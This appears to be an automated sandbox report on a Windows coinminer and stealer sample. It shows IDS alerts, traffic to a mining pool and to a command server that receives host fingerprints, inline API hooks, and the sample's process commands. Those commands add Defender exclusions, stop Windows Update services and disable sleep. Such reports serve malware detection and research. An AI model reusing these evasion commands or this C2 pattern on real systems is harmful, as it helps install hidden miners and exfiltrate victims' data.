msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-25T17:23:00.307417+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.4 | 49730 | 194.164.234.171 | 10128 | TCP
2024-12-25T17:23:07.931161+0100 | 2044697 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 | 1 | 192.168.2.4 | 49731 | 85.209.133.29 | 80 | TCP
2024-12-25T17:24:06.527059+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.4 | 49755 | 85.209.133.29 | 80 | TCP
2024-12-25T17:25:06.831505+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.4 | 49775 | 85.209.133.29 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 25, 2024 17:23:05.858596087 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:05.978415966 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:05.978503942 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:05.978692055 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:06.098202944 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:06.713646889 CET | 49731 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:23:06.839982033 CET | 80 | 49731 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:23:06.840054989 CET | 49731 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:23:06.841140032 CET | 49731 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:23:06.961911917 CET | 80 | 49731 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:23:06.962037086 CET | 49731 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:23:07.081746101 CET | 80 | 49731 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:23:07.241168022 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:07.369956970 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:07.804949045 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:07.931011915 CET | 80 | 49731 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:23:07.931102037 CET | 80 | 49731 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:23:07.931160927 CET | 49731 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:23:07.931317091 CET | 49731 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:23:07.963675022 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:08.050889015 CET | 80 | 49731 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:23:20.319685936 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:20.369945049 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:50.427695990 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:50.479578972 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:23:59.409249067 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:23:59.463773966 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:24:05.155015945 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:05.274676085 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:05.274776936 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:05.275913000 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:05.395422935 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:05.395621061 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:05.515213013 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:06.526787996 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:06.526885033 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:06.527059078 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:06.527059078 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:06.775880098 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:06.776073933 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:06.963799000 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:06.988707066 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:07.109549046 CET | 80 | 49755 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:24:07.109724998 CET | 49755 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:24:29.468874931 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:24:29.604448080 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:24:59.543951988 CET | 10128 | 49730 | 194.164.234.171 | 192.168.2.4
Dec 25, 2024 17:24:59.604545116 CET | 49730 | 10128 | 192.168.2.4 | 194.164.234.171
Dec 25, 2024 17:25:05.546364069 CET | 49775 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:25:05.736810923 CET | 80 | 49775 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:25:05.740186930 CET | 49775 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:25:05.740186930 CET | 49775 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:25:05.860121965 CET | 80 | 49775 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:25:05.864244938 CET | 49775 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:25:05.983822107 CET | 80 | 49775 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:25:06.831376076 CET | 80 | 49775 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:25:06.831505060 CET | 49775 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:25:06.831527948 CET | 80 | 49775 | 85.209.133.29 | 192.168.2.4
Dec 25, 2024 17:25:06.831597090 CET | 49775 | 80 | 192.168.2.4 | 85.209.133.29
Dec 25, 2024 17:25:06.951209068 CET | 80 | 49775 | 85.209.133.29 | 192.168.2.4
UDP Packets

Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
Dec 25, 2024 17:23:05.638781071 CET | 57134 | 53    | 192.168.2.4 | 1.1.1.1
Dec 25, 2024 17:23:05.854140997 CET | 53    | 57134 | 1.1.1.1     | 192.168.2.4
DNS Queries

Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name                    | Type           | Class       | DNS over HTTPS
Dec 25, 2024 17:23:05.638781071 CET | 192.168.2.4 | 1.1.1.1 | 0xf63d   | Standard query (0) | gulf.moneroocean.stream | A (IP address) | IN (0x0001) | false
DNS Answers

Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name                        | CName               | Address         | Type                   | Class       | DNS over HTTPS
Dec 25, 2024 17:23:05.854140997 CET | 1.1.1.1   | 192.168.2.4 | 0xf63d   | No error (0) | gulf.moneroocean.stream     | monerooceans.stream | -               | CNAME (Canonical name) | IN (0x0001) | false
Dec 25, 2024 17:23:05.854140997 CET | 1.1.1.1   | 192.168.2.4 | 0xf63d   | No error (0) | monerooceans.stream         | -                   | 194.164.234.171 | A (IP address)         | IN (0x0001) | false
Dec 25, 2024 17:23:15.322381973 CET | 1.1.1.1   | 192.168.2.4 | 0x713c   | No error (0) | bg.microsoft.map.fastly.net | -                   | 199.232.214.172 | A (IP address)         | IN (0x0001) | false
Dec 25, 2024 17:23:15.322381973 CET | 1.1.1.1   | 192.168.2.4 | 0x713c   | No error (0) | bg.microsoft.map.fastly.net | -                   | 199.232.210.172 | A (IP address)         | IN (0x0001) | false
                                                                • 85.209.133.29
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.4 | 49731       | 85.209.133.29  | 80               | 8052 | C:\Windows\System32\dialer.exe

Timestamp                          | Bytes transferred | Direction | Data
Dec 25, 2024 17:23:06.841140032 CET | 180 | OUT | POST /lowkey/api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 283
    Content-Type: application/json
    Host: 85.209.133.29
    User-Agent: cpp-httplib/0.12.6
Dec 25, 2024 17:23:06.962037086 CET | 283 | OUT | Data Raw: 7b 22 69 64 22 3a 22 67 6f 68 6b 66 79 76 71 62 70 6d 65 63 6e 69 64 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 33 37 31 36 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 33 38 48 47 37
    Data Ascii: {"id":"gohkfyvqbpmecnid","computername":"123716","username":"SYSTEM","gpu":"Y38HG77BH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System
Dec 25, 2024 17:23:07.931011915 CET | 97  | IN  | HTTP/1.1 404 Not Found
    content-length: 14
    date: Wed, 25 Dec 2024 16:23:07 GMT
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
    Data Ascii: File not found


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.4 | 49755       | 85.209.133.29  | 80               | 8052 | C:\Windows\System32\dialer.exe

Timestamp                          | Bytes transferred | Direction | Data
Dec 25, 2024 17:24:05.275913000 CET | 180 | OUT | POST /lowkey/api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 505
    Content-Type: application/json
    Host: 85.209.133.29
    User-Agent: cpp-httplib/0.12.6
Dec 25, 2024 17:24:05.395621061 CET | 505 | OUT | Data Raw: 7b 22 69 64 22 3a 22 67 6f 68 6b 66 79 76 71 62 70 6d 65 63 6e 69 64 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 33 37 31 36 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 33 38 48 47 37
    Data Ascii: {"id":"gohkfyvqbpmecnid","computername":"123716","username":"SYSTEM","gpu":"Y38HG77BH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System
Dec 25, 2024 17:24:06.526787996 CET | 97  | IN  | HTTP/1.1 404 Not Found
    content-length: 14
    date: Wed, 25 Dec 2024 16:24:06 GMT
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
    Data Ascii: File not found


Session ID | Source IP   | Source Port | Destination IP | Destination Port
2          | 192.168.2.4 | 49775       | 85.209.133.29  | 80

Timestamp                          | Bytes transferred | Direction | Data
Dec 25, 2024 17:25:05.740186930 CET | 180 | OUT | POST /lowkey/api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 491
    Content-Type: application/json
    Host: 85.209.133.29
    User-Agent: cpp-httplib/0.12.6
Dec 25, 2024 17:25:05.864244938 CET | 491 | OUT | Data Raw: 7b 22 69 64 22 3a 22 67 6f 68 6b 66 79 76 71 62 70 6d 65 63 6e 69 64 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 33 37 31 36 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 33 38 48 47 37
    Data Ascii: {"id":"gohkfyvqbpmecnid","computername":"123716","username":"SYSTEM","gpu":"Y38HG77BH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System
Dec 25, 2024 17:25:06.831376076 CET | 97  | IN  | HTTP/1.1 404 Not Found
    content-length: 14
    date: Wed, 25 Dec 2024 16:25:06 GMT
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
    Data Ascii: File not found


Code Manipulations

User-mode inline hooks found in explorer.exe and winlogon.exe. "New Data" is the bytes written over each function's prologue; 0xE9 is the x86 near JMP opcode, so each hooked export is redirected to the hook before the original code runs.

Function Name                 | Hook Type | Active in Processes        | New Data
ZwEnumerateKey                | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation      | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile         | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile         | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile          | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey           | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation      | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx        | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey           | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx        | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile          | INLINE    | explorer.exe, winlogon.exe | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                                                                Target ID:0
                                                                Start time:11:22:56
                                                                Start date:25/12/2024
                                                                Path:C:\Users\user\Desktop\0Ty.png.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\0Ty.png.exe"
                                                                Imagebase:0x7ff712420000
                                                                File size:5'457'920 bytes
                                                                MD5 hash:3CAE1F11044D2CA787824610A40F1696
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:11:22:56
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:11:22:56
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff6d9560000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x800000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:19
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:26
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe delete "HGLZSDMZ"
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:27
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:28
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
